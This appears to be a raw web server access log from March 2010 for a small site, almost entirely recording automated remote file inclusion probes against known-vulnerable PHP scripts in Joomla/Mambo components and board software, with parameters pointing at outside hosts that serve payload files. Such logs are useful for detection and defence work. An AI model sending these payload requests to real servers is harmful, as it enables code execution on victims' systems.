174.121.99.227 - - [06/Mar/2010:09:16:33 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
174.121.99.227 - - [06/Mar/2010:09:16:33 -0800] "GET /include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
174.121.99.227 - - [06/Mar/2010:09:16:33 -0800] "GET /logs//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:16:49 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:16:54 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:16:59 -0800] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:09:18:12 -0800] "GET /logs//bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:09:18:13 -0800] "GET /bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
193.138.158.46 - - [06/Mar/2010:09:18:14 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.138.158.46 - - [06/Mar/2010:09:18:14 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.138.158.46 - - [06/Mar/2010:09:18:14 -0800] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:09:18:15 -0800] "GET /logs/access.log//bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
199.187.120.214 - - [06/Mar/2010:09:19:25 -0800] "GET /logs/access.log//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:19:46 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:19:46 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:19:46 -0800] "GET /logs/access_100227.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:19:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:19:50 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:19:50 -0800] "GET /logs/access_100227.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:20:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:20:10 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:20:17 -0800] "GET /logs/access_100227.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:20:28 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:20:28 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.163.178.130 - - [06/Mar/2010:09:20:32 -0800] "GET /logs/access_100227.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:12 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:12 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:12 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:12 -0800] "GET /logs/access.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:12 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:12 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:51 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:51 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:21:51 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:23:00 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:23:00 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:23:00 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:23:11 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:23:11 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:23:11 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:09:23:11 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:09:23:11 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:09:23:11 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
193.138.158.46 - - [06/Mar/2010:09:24:40 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:09:25:15 -0800] "GET /logs/access_100227.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:09:25:15 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:09:25:15 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:26:19 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:26:19 -0800] "GET /logs/access_100227.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:09:26:19 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.150.224.212 - - [06/Mar/2010:09:28:32 -0800] "GET /include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.150.224.212 - - [06/Mar/2010:09:28:32 -0800] "GET /logs//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.150.224.212 - - [06/Mar/2010:09:28:32 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:09:32:30 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:09:32:30 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:09:32:30 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:09:32:41 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:09:32:41 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:09:32:41 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.150.224.212 - - [06/Mar/2010:09:32:42 -0800] "GET /logs/access.log//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:09:41:25 -0800] "GET /logs/access.log/errors.php?error=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:09:41:25 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:09:41:25 -0800] "GET /logs/errors.php?error=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:09:41:26 -0800] "GET /logs/access.log/errors.php?error=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:09:41:26 -0800] "GET /logs/errors.php?error=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:09:41:26 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:09:46:25 -0800] "GET /logs/access.log//bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:09:46:25 -0800] "GET /logs//bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:09:46:25 -0800] "GET /bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:49:34 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:49:34 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:49:41 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.249.65.168 - - [06/Mar/2010:09:51:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.getyourselfahorse.com"
66.249.65.168 - - [06/Mar/2010:09:51:42 -0800] "GET / HTTP/1.1" 200 915 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.getyourselfahorse.com"
218.38.29.80 - - [06/Mar/2010:09:55:28 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
218.38.29.80 - - [06/Mar/2010:09:55:28 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "getyourselfahorse.com"
218.38.29.80 - - [06/Mar/2010:09:55:28 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "getyourselfahorse.com"
77.120.104.120 - - [06/Mar/2010:10:04:44 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
77.120.104.120 - - [06/Mar/2010:10:04:44 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
77.120.104.120 - - [06/Mar/2010:10:04:44 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:10:08:41 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:10:08:41 -0800] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:10:08:41 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:10:09:20 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:10:09:20 -0800] "GET /logs/access_100227.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:10:09:20 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.46.204.187 - - [06/Mar/2010:10:16:01 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:10:20:23 -0800] "GET /logs//zboard.php?id=http://sanvan.net/new/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:10:20:26 -0800] "GET /logs/access.log%20%20//zboard.php?id=http://sanvan.net/new/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:10:21:40 -0800] "GET /logs//zboard.php?id=http://sanvan.net/new/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:10:21:40 -0800] "GET /logs/access_100227.log%20%20//zboard.php?id=http://sanvan.net/new/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:10:21:43 -0800] "GET /zboard.php?id=http://sanvan.net/new/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:10:23:00 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:10:23:00 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:10:23:00 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
201.93.165.28 - - [06/Mar/2010:10:23:20 -0800] "GET /logs/access.log///business_inc/delete.php?thisdir=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
201.93.165.28 - - [06/Mar/2010:10:23:20 -0800] "GET //business_inc/delete.php?thisdir=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
201.93.165.28 - - [06/Mar/2010:10:23:20 -0800] "GET /logs///business_inc/delete.php?thisdir=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:10:23:26 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:10:23:26 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:10:23:26 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.46.204.187 - - [06/Mar/2010:10:24:37 -0800] "GET / HTTP/1.1" 200 915 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
118.129.166.154 - - [06/Mar/2010:10:25:52 -0800] "GET /board//bbs//////////good.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.166.154 - - [06/Mar/2010:10:25:52 -0800] "GET /logs/access.log%20%20//board//bbs//////////good.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.166.154 - - [06/Mar/2010:10:25:52 -0800] "GET /logs//board//bbs//////////good.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:10:26:31 -0800] "GET /zboard.php?id=http://sanvan.net/new/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
